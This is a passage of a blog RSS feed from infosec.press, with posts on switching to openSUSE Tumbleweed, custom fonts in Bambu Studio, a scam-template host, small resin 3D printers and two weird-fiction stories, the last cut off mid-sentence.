<p>I admit I did little reading about the tools the distribution offers, like the package manager and YaST. Or that a pattern you install and then uninstall with <code>zypper</code> will be installed again when you update your system. If it was removed, it has no business being installed again, and I shouldn&#39;t have to create a lock on that pattern to prevent that behavior. This makes no sense to me as a user.</p>

<p>I did take a look at their docs, but they pale in comparison to the Arch Wiki. OpenSUSE could actually learn a few things from Arch in this regard to improve their documentation, in my opinion.</p>

<h3 id="a-mostly-smooth-sail-so-far">A mostly smooth sail (so far)</h3>

<p>Of course, this hasn&#39;t been a perfect experience.</p>

<p>The day after installing the distro, I installed <code>profile-sync-daemon</code>, a tool that copies your browser profile into RAM while you&#39;re using it and lets you set up a sync interval with the filesystem, so it doesn&#39;t batter the SSD or NVMe so much. I believe I also installed some updates after that, and then rebooted.</p>

<p>The system booted fine, and I was able to log in to Plasma. Then, no matter what application I tried to launch, it would show an error and wouldn&#39;t open. It took me a bit to remember that this tool fills the user&#39;s <code>tmpfs</code>  if you have the default 20% for the <code>RuntimeDirectorySize</code> in systemd&#39;s <code>logind.conf</code>.</p>

<p>Even with 12 GB of RAM and 12 GB of SWAP, this happens.</p>

<p>I bumped the value to 30%, just to be super safe, rebooted, and voilà, I could open applications again.</p>

<p>I think this was the only major issue.</p>

<p>I also had an issue with a kernel update that wouldn&#39;t boot, but I had the previous kernel version still installed, so it didn&#39;t matter all that much.</p>

<p>Additionally, some tools I use aren&#39;t available in the repos, but it&#39;s just a few, and that&#39;s easily fixable by compiling them. Given that most of these tools are written in Go, it&#39;s easier to deal with dependencies.</p>

<p>Let&#39;s see if I&#39;ll revisit my decision of using OpenSUSE Tumbleweed in a few months.</p>

<p>#Ubuntu #OpenSUSE #Linux #SystemD #GNOME #KDE</p>
]]></content:encoded>
      <author>Bruno&#39;s ramblings</author>
      <guid>https://infosec.press/read/a/d8l4jfyhgh</guid>
      <pubDate>Mon, 01 Dec 2025 04:22:46 +0000</pubDate>
    </item>
    <item>
      <title>How to add custom font into Bambu Studio</title>
      <link>https://infosec.press/tailamscience/0016-how-to-add-custom-font-into-bambu-studio</link>
      <description>&lt;![CDATA[I believed I would have to make a &#34;sign&#34; from a PNG screenshot, convert it into an SVG, and lastly create an STL file for 3D printing.&#xA;&#xA;However, I realized I can simply add custom fonts into Bambu Studio.&#xA;&#xA;!--more--&#xA;&#xA;This Bambu Lab forum thread&#xA;set me off in the correct direction.&#xA;&#xA;Conclusion: Reddit is not always helpful&#xA;&#xA;Again, there are Reddit threads that are not helpful:&#xA;&#xA;This thread from February 2023, and&#xA;This thread from December 2022.]]&gt;</description>
      <content:encoded><![CDATA[<p>I believed I would have to make a “sign” from a PNG screenshot, convert it into an SVG, and lastly create an STL file for 3D printing.</p>

<p>However, I realized I can simply add custom fonts into Bambu Studio.</p>



<p>This Bambu Lab <a href="https://forum.bambulab.com/t/adding-custom-fonts-to-bambu-studio/5936/51" rel="nofollow">forum thread</a>
set me off in the correct direction.</p>

<h2 id="conclusion-reddit-is-not-always-helpful">Conclusion: Reddit is not always helpful</h2>

<p>Again, there are Reddit threads that are <strong>not</strong> helpful:</p>
<ul><li>This <a href="https://old.reddit.com/r/BambuLab/comments/117jlba/add_custom_fonts_to_bambu_studio/" rel="nofollow">thread</a> from February 2023, and</li>
<li>This <a href="https://old.reddit.com/r/BambuLab/comments/zsrlzu/fonts_in_bambu_studio/" rel="nofollow">thread</a> from December 2022.</li></ul>
]]></content:encoded>
      <author>Tai Lam in Science</author>
      <guid>https://infosec.press/read/a/tfbaltnuwa</guid>
      <pubDate>Fri, 14 Nov 2025 17:00:00 +0000</pubDate>
    </item>
    <item>
      <title>The enablers</title>
      <link>https://infosec.press/ducks/the-enablers</link>
      <description>&lt;![CDATA[The hosts. And the templates for the cryptoscammers, the &#34;cargospammers&#34;, the fake bank scammers etc are being made by someone(s). You name it. Have given up on the hosts. Seems we have to settle with &#34;name and shame&#34;.&#xA;And then we have the brokers. And the spammers, the &#34;affiliate&#34; networks.&#xA;We sometimes stumble over all kinds of these, should start to make a list.&#xA;&#xA;gogowebsites.store &#xA;https://www.gogowebsites.store/&#xA;Creation Date: 2025-03-24 (namecheap)&#xA;hosted at 198.251.88.162 (Frantech/Ponynet)&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>The hosts. And the templates for the cryptoscammers, the “cargospammers”, the fake bank scammers etc are being made by someone(s). You name it. Have given up on the hosts. Seems we have to settle with “name and shame”.
And then we have the brokers. And the spammers, the “affiliate” networks.
We sometimes stumble over all kinds of these, should start to make a list.</p>

<h3 id="gogowebsites-store">gogowebsites.store</h3>

<p><a href="https://www.gogowebsites.store/" rel="nofollow">https://www.gogowebsites.store/</a>
Creation Date: 2025-03-24 (namecheap)
hosted at 198.251.88.162 (Frantech/Ponynet)</p>
]]></content:encoded>
      <author>Ducks</author>
      <guid>https://infosec.press/read/a/z23ljc8bda</guid>
      <pubDate>Sun, 09 Nov 2025 03:14:00 +0000</pubDate>
    </item>
    <item>
      <title>15: Considering really small resin 3D printers</title>
      <link>https://infosec.press/tailamscience/0015-considering-really-small-resin-3d-printers</link>
      <description>&lt;![CDATA[This was originally written on November 7, 2025.&#xA;&#xA;So I was wondering about 3D resin printing, as I saw a video from 3D Printing Nerd.&#xA;&#xA;(Random: I think Joel of 3D Printing Nerd is basically like Markiplier in 3D printing, with some of Mark&#39;s hyperactivity toned down.)!--more--&#xA;&#xA;Some thoughts&#xA;&#xA;So, I&#39;ve seen the acronym SLA, which is associated with resin 3D printing, which comes from stereolithography.&#xA;&#xA;I was interested in the TinyMaker, which was the very small resin 3D printer showcased in the video.  There was initially a Kickstarter crowdfunding campaign, and then a continued open-end timeline campaign on IndieGoGo.&#xA;&#xA;The video mentioned that the TinyMaker files are available, and TinyMaker states that it is open source hardware.  However, I had no luck finding the files, at least easily.  The only result I found was this GitHub repository, which was last active in 2018.&#xA;&#xA;Currently I&#39;m a bit wary, as some backers are only recently receiving the TinyMaker 2 years after the campaign ended.  Yes, I know there&#39;s an inherent risk with crowdfunding.  So, I&#39;ll wait until TinyMaker reaches steady public availability.&#xA;&#xA;Alternatives: maybe just get a &#34;normal&#34; sized resin printer?&#xA;&#xA;I might as well consider the currently only option from Prusa for consumers: the Original Prusa SL1S SPEED 3D Printer and CW1S (cure and wash station) bundle.&#xA;&#xA;There is a MSLA (masked SLA) printer from Prusa: Prusa Pro SLX.  However, that looks like a professional industrial machine, and it is still &#34;coming soon&#34; (as of November 2025).&#xA;&#xA;Conclusion&#xA;&#xA;Currently, a comparable product is the Lite3DP Gen 2, which is available on Crowd Supply.]]&gt;</description>
      <content:encoded><![CDATA[<p><em>This was originally written on November 7, 2025.</em></p>

<p>So I was wondering about 3D resin printing, as I saw a <a href="https://youtu.be/3u0idTuaJSo" rel="nofollow">video</a> from 3D Printing Nerd.</p>

<p>(Random: I think Joel of 3D Printing Nerd is basically like Markiplier in 3D printing, with some of Mark&#39;s hyperactivity toned down.)</p>

<h2 id="some-thoughts">Some thoughts</h2>

<p>So, I&#39;ve seen the acronym SLA, which is associated with resin 3D printing, which comes from <a href="https://en.wikipedia.org/wiki/Stereolithography" rel="nofollow">stereolithography</a>.</p>

<p>I was interested in the <a href="https://tinymaker3d.com/" rel="nofollow">TinyMaker</a>, which was the very small resin 3D printer showcased in the video.  There was initially a Kickstarter crowdfunding <a href="https://www.kickstarter.com/projects/tinymaker/tinymaker-3d-printer/description" rel="nofollow">campaign</a>, and then a continued open-end timeline <a href="https://www.indiegogo.com/en/projects/tinymaker/tinymaker-open-source-3d-printer--2" rel="nofollow">campaign</a> on IndieGoGo.</p>

<p>The video mentioned that the TinyMaker files are available, and TinyMaker states that it is open source hardware.  However, I had no luck finding the files, at least easily.  The only result I found was this GitHub <a href="http://github.com/impakho/TinyMaker" rel="nofollow">repository</a>, which was last active in 2018.</p>

<p>Currently I&#39;m a bit wary, as some backers are only recently receiving the TinyMaker 2 years after the campaign ended.  Yes, I know there&#39;s an inherent risk with crowdfunding.  So, I&#39;ll wait until TinyMaker reaches steady public availability.</p>

<h3 id="alternatives-maybe-just-get-a-normal-sized-resin-printer">Alternatives: maybe just get a “normal” sized resin printer?</h3>

<p>I might as well consider the currently only <a href="https://www.prusa3d.com/product/original-prusa-sl1s-speed-3d-printer-cw1s-bundle/" rel="nofollow">option</a> from Prusa for consumers: the Original Prusa SL1S SPEED 3D Printer and CW1S (cure and wash station) bundle.</p>

<p>There is a MSLA (masked SLA) <a href="https://www.prusa3d.com/applications/prusa-pro-slx_236051/" rel="nofollow">printer</a> from Prusa: Prusa Pro SLX.  However, that looks like a professional industrial machine, and it is still “coming soon” (as of November 2025).</p>

<h2 id="conclusion">Conclusion</h2>

<p>Currently, a comparable product is the Lite3DP Gen 2, which is available on <a href="https://www.crowdsupply.com/lite3dp/lite3dp-gen-2" rel="nofollow">Crowd Supply</a>.</p>
]]></content:encoded>
      <author>Tai Lam in Science</author>
      <guid>https://infosec.press/read/a/r9f5297d6v</guid>
      <pubDate>Fri, 07 Nov 2025 17:00:00 +0000</pubDate>
    </item>
    <item>
      <title>Lavorare male</title>
      <link>https://infosec.press/critic/lavorare-male</link>
      <description>&lt;![CDATA[Rivalutare il lavorare male può essere una salvezza alle volte.]]&gt;</description>
      <content:encoded><![CDATA[<p>Rivalutare il lavorare male può essere una salvezza alle volte.</p>
]]></content:encoded>
      <author>critic</author>
      <guid>https://infosec.press/read/a/717vtw7maf</guid>
      <pubDate>Tue, 21 Oct 2025 09:02:33 +0000</pubDate>
    </item>
    <item>
      <title>There was a Knock</title>
      <link>https://infosec.press/jrdepriest/there-was-a-knock</link>
      <description>&lt;![CDATA[The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.&#xA;&#xA;But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.&#xA;&#xA;We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies, built of atoms and molecules, cannot go. These worlds are just as real, just as vibrant.&#xA;&#xA;And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even &#34;project&#34; something of themselves down to our level as emissaries or explorers such as many-named Nyarlet&#39;hotep and its lesser-known siblings NAM, NUM, and IM.&#xA;&#xA;But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can&#39;t even truly look at them because, to us, those angles, do not exist.&#xA;&#xA;We call the gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.&#xA;&#xA;Is it any wonder that imps, gremlins, fae. demons, all the so-called &#34;lesser&#34; outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or or mock us? Who can say? Their minds and motives are just as alien.&#xA;&#xA;So who did I meet that unusually warm Saturday night?&#xA;&#xA;I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.&#xA;&#xA;Not my front door, nor my back door.&#xA;&#xA;It came from my basement door.&#xA;&#xA;If I were a cat, my hackles would be raised. Instead, a sort of panic hit. Wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.&#xA;&#xA;I have no guns no serious weapons save a ceremonial sword mounted much to far out of reach.&#xA;&#xA;I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.&#xA;&#xA;I can&#39;t recall seeing his eyes.&#xA;&#xA;&#34;Excellent!&#34; he said in a thick British accent stolen from Austin Powers.&#xA;&#xA;&#34;This is one where you listen.&#34;&#xA;&#xA;&#34;Are you doing a bit?&#34; I grasped, looking past him for a cameraman or some hint that this was a misguided joke.&#xA;&#xA;&#34;A bit?&#34; He rubbed his chin with his right hand. &#34;I don&#39;t think so.&#34;&#xA;&#xA;He offered his left hand.&#xA;&#xA;&#34;Archibald Horatio Pierse, IV,&#34; he said, overly emphasizing The Fourth as if it was of great importance. &#34;Pierse with an &#39;s&#39;,&#34; concluded his introduction.&#xA;&#xA;He was still shaking my hand, which I didn&#39;t remember offering in return.&#xA;&#xA;&#34;Sometimes,&#34; he said. &#34;I like to pop in and give a bloke or bird whose almost got it a little glimpse of the whole.&#34;&#xA;&#xA;&#39;bloke or bird,&#39; I thought. This has to be a bit.&#xA;&#xA;&#34;Right,&#34; he said, no longer shaking my left hand, but still holding it.&#xA;&#xA;The world fractured, splintered. Every cell pulled in a different direction.&#xA;&#xA;Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.&#xA;&#xA;We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.&#xA;&#xA;We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.&#xA;&#xA;There is no pattern, no spider&#39;s web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.&#xA;&#xA;When we dream, we are free to reach into the other uses and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.&#xA;&#xA;Gender, race, nationality, species, moral character, upbringing: I am every possibility.&#xA;&#xA;I am every drop in the ocean and the ocean itself.&#xA;&#xA;I am the sky, the moon, the stars, a worm, a bacteria, a lichen.&#xA;&#xA;The one who showed me—I had forgotten he existed—he bade me, &#34;turn around.&#34;&#xA;&#xA;What a strange request! I am all that is and was. Do I not already &#34;see&#34; in every direction?&#xA;&#xA;&#34;Turn around.&#34;&#xA;&#xA;A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.&#xA;&#xA;Syzygy.&#xA;&#xA;I am All, yet All That is Not Me is also All.&#xA;&#xA;I see the tapestry, the enmeshed pattern.&#xA;&#xA;The beauty.&#xA;&#xA;The belonging.&#xA;&#xA;The Love.&#xA;&#xA;Every part of me weeps.&#xA;&#xA;An infinity of infinities.&#xA;&#xA;Each unique.&#xA;&#xA;Together, whole.&#xA;&#xA;Like curtains dancing in the breeze.&#xA;&#xA;Like a rainstorm.&#xA;&#xA;Like staring at the sun.&#xA;&#xA;Like the song of cicadas.&#xA;&#xA;Unity.&#xA;&#xA;From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…&#xA;&#xA;All is One and One is All.&#xA;&#xA;Then I&#39;m lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.&#xA;&#xA;And I can&#39;t stop crying.&#xA;&#xA;---&#xA;&#xA;#WritersOfMastodon #Writer #Writing #WeirdFiction ]]&gt;</description>
      <content:encoded><![CDATA[<p>The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.</p>

<p>But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.</p>

<p>We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies, built of atoms and molecules, cannot go. These worlds are just as real, just as vibrant.</p>

<p>And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet&#39;hotep and its lesser-known siblings NAM, NUM, and IM.</p>

<p>But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need <strong>not</strong> obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can&#39;t even truly <em>look</em> at them because, to us, those angles, do not exist.</p>

<p>We call the gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.</p>

<p>Is it any wonder that imps, gremlins, fae. demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or or mock us? Who can say? Their minds and motives are just as alien.</p>

<p>So who did I meet that unusually warm Saturday night?</p>

<p>I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.</p>

<p>Not my front door, nor my back door.</p>

<p>It came from my basement door.</p>

<p>If I were a cat, my hackles would be raised. Instead, a sort of panic hit. Wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.</p>

<p>I have no guns no serious weapons save a ceremonial sword mounted much to far out of reach.</p>

<p>I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.</p>

<p>I can&#39;t recall seeing his eyes.</p>

<p>“Excellent!” he said in a thick British accent stolen from Austin Powers.</p>

<p>“This is one where you <em>listen</em>.”</p>

<p>“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.</p>

<p>“A bit?” He rubbed his chin with his right hand. “I don&#39;t think so.”</p>

<p>He offered his left hand.</p>

<p>“Archibald Horatio Pierse, IV,” he said, overly emphasizing <strong>The Fourth</strong> as if it was of great importance. “Pierse with an &#39;s&#39;,” concluded his introduction.</p>

<p>He was still shaking my hand, which I didn&#39;t remember offering in return.</p>

<p>“Sometimes,” he said. “I like to pop in and give a bloke or bird whose <em>almost</em> got it a little glimpse of the whole.”</p>

<p>&#39;bloke or bird,&#39; I thought. This <em>has</em> to be a bit.</p>

<p>“Right,” he said, no longer shaking my left hand, but still holding it.</p>

<p>The world fractured, splintered. Every cell pulled in a different direction.</p>

<p>Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.</p>

<p>We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.</p>

<p>We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.</p>

<p>There is no pattern, no spider&#39;s web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.</p>

<p>When we dream, we are free to reach into the other uses and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.</p>

<p>Gender, race, nationality, <em>species</em>, moral character, upbringing: I am every possibility.</p>

<p>I am every drop in the ocean and the ocean itself.</p>

<p>I am the sky, the moon, the stars, a worm, a bacteria, a lichen.</p>

<p>The one who showed me—I had forgotten he existed—he bade me, “turn around.”</p>

<p>What a strange request! I am all that is and was. Do I not already “see” in every direction?</p>

<p>“Turn around.”</p>

<p>A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a <em>new</em> direction.</p>

<p><strong><em>Syzygy.</em></strong></p>

<p>I am All, yet All That is Not Me is also All.</p>

<p>I see the tapestry, the enmeshed pattern.</p>

<p>The beauty.</p>

<p>The belonging.</p>

<p>The Love.</p>

<p>Every part of me weeps.</p>

<p>An infinity of infinities.</p>

<p>Each unique.</p>

<p>Together, whole.</p>

<p>Like curtains dancing in the breeze.</p>

<p>Like a rainstorm.</p>

<p>Like staring at the sun.</p>

<p>Like the song of cicadas.</p>

<p>Unity.</p>

<p>From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…</p>

<p>All is One and One is All.</p>

<p>Then I&#39;m lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.</p>

<p>And I can&#39;t stop crying.</p>

<hr>

<p>#WritersOfMastodon #Writer #Writing #WeirdFiction</p>
]]></content:encoded>
      <author>J. R. DePriest</author>
      <guid>https://infosec.press/read/a/wdyet0kywy</guid>
      <pubDate>Sun, 19 Oct 2025 19:12:02 +0000</pubDate>
    </item>
    <item>
      <title>The Last Adventure</title>
      <link>https://infosec.press/jrdepriest/the-last-adventure</link>
      <description>&lt;![CDATA[I feel my peaceful breathing, the heavy blankets on top of me. I open my eyes, expecting to see my wife beside me, reading a book by lamplight. Instead, I’m alone in a single bed under layers of fur comforters.&#xA;&#xA;I can see my breath in the dim, reddish light. I look around.&#xA;&#xA;No other furniture, a backpack, shoulder bag, and pile of folded clothes on the floor against the wall to my right. I sit up and see a short stack of spiral notebooks next to it: my life’s work. It’s always with me as I have no permanent address.&#xA;&#xA;I look up at the wall near the ceiling. Emergency lights. The only lights.&#xA;&#xA;Slowly the sound comes in.&#xA;&#xA;First, my steady breathing.&#xA;&#xA;Next, the stillness.&#xA;&#xA;Dripping, creaking, distant muffled voices.&#xA;&#xA;A laugh.&#xA;&#xA;I remember who I am.&#xA;&#xA;A consultant brought in by the mystery solving Derringer family. More Scooby-Doo than Supernatural, despite the name. Not that they would understand either of those references.&#xA;&#xA;This is the abandoned hotel next to the old haunted Gilded Djinn amusement park. They got the generator working so they could live here while studying the place.&#xA;&#xA;The dad was possessed. They didn’t know it. The ghost of a Parisienne serial killer put to death in 1938 had possessed him shortly after they got here three weeks ago. The ghost of a child, dead since 1953, told me about it last night. Even though I can see them, the child was but a wisp, a pink sparkling cloud in the shape of a skull. She&#39;d been trying to reach me for days, but the serial killer was strong and suppressed, repressed, the others, hid itself plainly behind living flesh in a way that even I hadn’t noticed.&#xA;&#xA;She can’t tell me her name. Maybe she doesn’t remember it. I call her Papillon because her fluttering colors remind me of a butterfly and she seems to like that.&#xA;&#xA;She could only whisper and hint as to say more courts his attention, but I understood last night. I was supposed to stop him from killing again as he’d taken a secret mistress from town. They were never good enough. No matter how hard he tried to raise them from their station. No matter what he bought them, no matter how he lavished them. No matter what he did to educate them. They were all beneath him and they wasted his time and his affection. Again and again. They were so worthless that killing them was a mercy, the kindest thing he could do for them.&#xA;&#xA;And the body he wore while doing it? Well, they should have had a stronger will than his own, shouldn’t they? The flesh is weak and he is most definitely not weak. Let them sort it out if they can. They swagger around in warmth, wearing blood and sweat; smelling, touching, feeling. Let them figure out what happened, why they went mad. If, with their vaulted senses and biological faculties, they were unable to ferret him out, then they deserved their fates.&#xA;&#xA;I shrug off the covers, invigorated by the chill, breath deeply.&#xA;&#xA;Mildew, moisture, decay. For some reason, I grin.&#xA;&#xA;I slide around and step out of bed.&#xA;&#xA;SQUISH&#xA;&#xA;Shivering ice shoots up my legs all the way to my shoulders.&#xA;&#xA;I remember the dripping sound, whip my head to the inside wall.&#xA;&#xA;drip&#xA;&#xA;Rivulets of water from the room above running down the wall.&#xA;&#xA;I “see” the room, the father smiling at a strange brunette woman in a steamy bathroom. Behind his eyes, I see another set of eyes, greedy, indolent, and apathetic.&#xA;&#xA;Papillon floats out of my head.&#xA;&#xA;“sorry,” she whispers, a voice closer to my ear than her floating form appears.&#xA;&#xA;I feel her shame at invading my space but there was no violation.&#xA;&#xA;“Don’t be. It was far more expedient to show me than to try to tell me.&#xA;“When?”&#xA;&#xA;Time is elusive to a ghost. Being detached from a body’s signals and urges leaves one prone to missing days or weeks at a time.&#xA;&#xA;A quiver passes through her. “i stayed aware so it must only be hours”&#xA;&#xA;“So he’s close to finishing the act, then?”&#xA;&#xA;She hesitates. I can feel her reaching out, testing the air, probing for his eyes.&#xA;&#xA;“yes” she finally whispers.&#xA;&#xA;I slosh over to my belongings, now sitting in two centimeters of water.&#xA;&#xA;I look down at myself, a young adult man, black; thin, but well-built; wearing loose sleep pants and boxer shorts. No shirt.&#xA;&#xA;I kneel down to check my fresh clothes. Even the top ones are damp.&#xA;&#xA;I glance at my other belongings.&#xA;&#xA;My eyes go wide in panic. My heart pounds and my ears ring.&#xA;&#xA;My notebooks.&#xA;&#xA;I gently touch the top.&#xA;&#xA;Wet.&#xA;&#xA;My vision goes red and my teeth grit, grinding so hard my jaw hurts.&#xA;&#xA;At the same time, tears well and begin to spill.&#xA;&#xA;I gingerly scoop them up and place them on top of the covers on the bed, afraid to spread them out and risk further damage.&#xA;&#xA;Thirty years of notes, observations, dreams, musings, philosophy, journaling, secrets.&#xA;&#xA;My heart sinks to my stomach.&#xA;&#xA;So many memories.&#xA;&#xA;Hands in fists, nails digging into my palms, tears rolling down my face, breathing in ragged bursts.&#xA;&#xA;“I will kill him,” I think, seeing the desiccated, skeletal form of the ghost riding Paul Derringer, using his body for pleasure and murder. “I will rip him from the body, tear him into strips, and swallow them one at a time while he wails in horror.”&#xA;&#xA;How does one kill a ghost? I know how yet rarely have I done it.&#xA;&#xA;I will relish killing him. I will bask in his suffering as I eat his essence.&#xA;&#xA;Shocked at my own thoughts, I try to calm myself, try to slow my breathing, control my pulse.&#xA;&#xA;Papillon nudges me over and over.&#xA;&#xA;She cannot see me like this.&#xA;&#xA;I look at her but can’t speak.&#xA;&#xA;A page from my notebook floats in the air, deftly separated from the rest without damage.&#xA;&#xA;It sparkles with Papillon’s light, flattens, dries, without smearing the ink further, without tearing or ripping, without sticking to the other pages.&#xA;&#xA;Moments later, the dry, clean page floats to the bed and another appears and undergoes the same methodical process.&#xA;&#xA;She can rescue them. She can save my past.&#xA;&#xA;My tears switch to those of relief, joy and mostly, of gratitude.&#xA;&#xA;I nod to Papillon.&#xA;&#xA;My blue jeans will be far to wet, even for an industrious little ghost. The sleep pants will suffice. My boots will be fine as the water was not deep enough to rise up over the rubber.&#xA;&#xA;The closet still has the dusty old outfits of the last person to stay here. I find a shirt only a size or two too large.&#xA;&#xA;Time is slipping, so this must be good enough.&#xA;&#xA;The family waits for me outside.&#xA;&#xA;Paul grins as if he knows that I know. “About time, Tarek. We thought maybe you’d taken a sleeping pill. Not sure how you slept through the commotion.” He’s fit for his age, effortlessly athletic and buoyant. Before the ghost indwelling, his generosity and kindness were overflowing. Now he prefers sarcasm and backhanded compliments.&#xA;&#xA;The sleeping pill reference tells me what he did with the woman I saw in my vision.&#xA;&#xA;Ainara, the mother, weary and weathered, smiles purely. Even beneath the hard years, of chasing ghosts, of raising four children, her deep alluring elegance seeps through. In another life, I would have courted her, married her, and kept her far away from this nonsense, forgoing even my own natural gifts so that I might spend all my efforts giving her everything she ever needed.&#xA;&#xA;Adam, the oldest brother was away on his own investigation, leaving barely 18 Tom and the twin teenage girls, Cori (Corinna) and Eri (Erinna), named after Greek poets. The girls were destined to get their own spin-off set of adventures, that was obvious. Tom would have his own, as well soon enough. After Adam disappears during his investigation in the Appalachians in the coming months leading such that Tom sets off to find him.&#xA;&#xA;The parents would retire into the background, showing up for the sake of nostalgia and for frequent flashbacks and phone calls for guidance.&#xA;&#xA;But this story was to be the crowning achievement of the family as a unit, the last time they all worked together, save Adam whose absence sets up the next series. This was high stakes, lives on the line, pulling out all the stops. The possession of Paul was telegraphed far earlier to those who had been paying attention, long before I was brought in as a cross-over character.&#xA;&#xA;They stand around a glowing hole in the parking lot leading down into the earth. It had not been there the night before.&#xA;&#xA;Smoke or steam rises from it and it glows with red light, similar to the emergency lights in the hotel.&#xA;&#xA;“That opened up last night?” I ask.&#xA;&#xA;&#34;The storm?” Ainara asks. “The air rang like collapsing steel for hours behind a wall of black water.”&#xA;&#xA;Cori adds, “there was no lightning.” Then Eri, “but plenty of thunder.”&#xA;&#xA;Tom shakes his head, hands on his hips. “I don’t like it.” He motions toward me. “T, come take a look, please. Let us know what you see.”&#xA;&#xA;I nod and walk over, letting my vision fade in and out of this world and the other.&#xA;&#xA;In the other, I see pale, glowing tumbleweeds drifting and flowing toward the hole, not fast, not a torrent, but it is like a drain has been opened into the other world and any ghost form or related energy not firmly connected is being drawn back toward it.&#xA;&#xA;I think about Papillon and how she was eager to repair my notebooks wondering if she was seeking something to keep her attached for just a little while longer.&#xA;&#xA;“It’s an opening into the other world,” I tell them plainly. “Give it time and it will clean up the infestation at Gilded Djinn all on its own.”&#xA;&#xA;Paul immediately interrupts. “But then we’ll never know what caused it. We have to go in. We have to figure this out.”&#xA;&#xA;Ainara stares at Paul, holding her mouth steady, squinting at him, but saying nothing.&#xA;&#xA;Tom, newly a man, counters, “Dad. We are not prepared for this. We do not have equipment for spelunking, certainly not into the freaking other world.”&#xA;&#xA;The girls, who I know have underdeveloped psychic powers of their own, glance at the hole and at each other, sharing a conversation only they can hear. I know they want to go inside. I know they want to go inside and are afraid of the fact that they want to go inside. I know they will be pushed to the brink and the struggle to save their family will enable their psychic powers to burst through.&#xA;&#xA;I know that hole is more than just a portal to the other world. I know we are expected down there. There are long-gestating plans finally coming to fruition. Entire bloodlines worked toward this day.&#xA;&#xA;We will go down into the hole.&#xA;&#xA;We must.&#xA;&#xA;Paul looks at me. “Tarek can help us see our way, right?”&#xA;&#xA;I lick my lips, rub my chin, feel the inevitability, the pull of the narrative.&#xA;&#xA;“I will do my best, Paul. I will keep you safe.” It’s a lie, but a necessary one.&#xA;&#xA;So, after Paul loans me a pair of pants and I go change, after I gather a few trinkets from my belongings that might help us, an antique ghost-light, a handful of protective carvings, a bracelet for each of the twins and for Ainara.&#xA;&#xA;Tom has the globular, gold, tin, silver, copper, and glass ghost-light. I demonstrate how you squeeze the mechanism on the side, it spins a dynamo inside 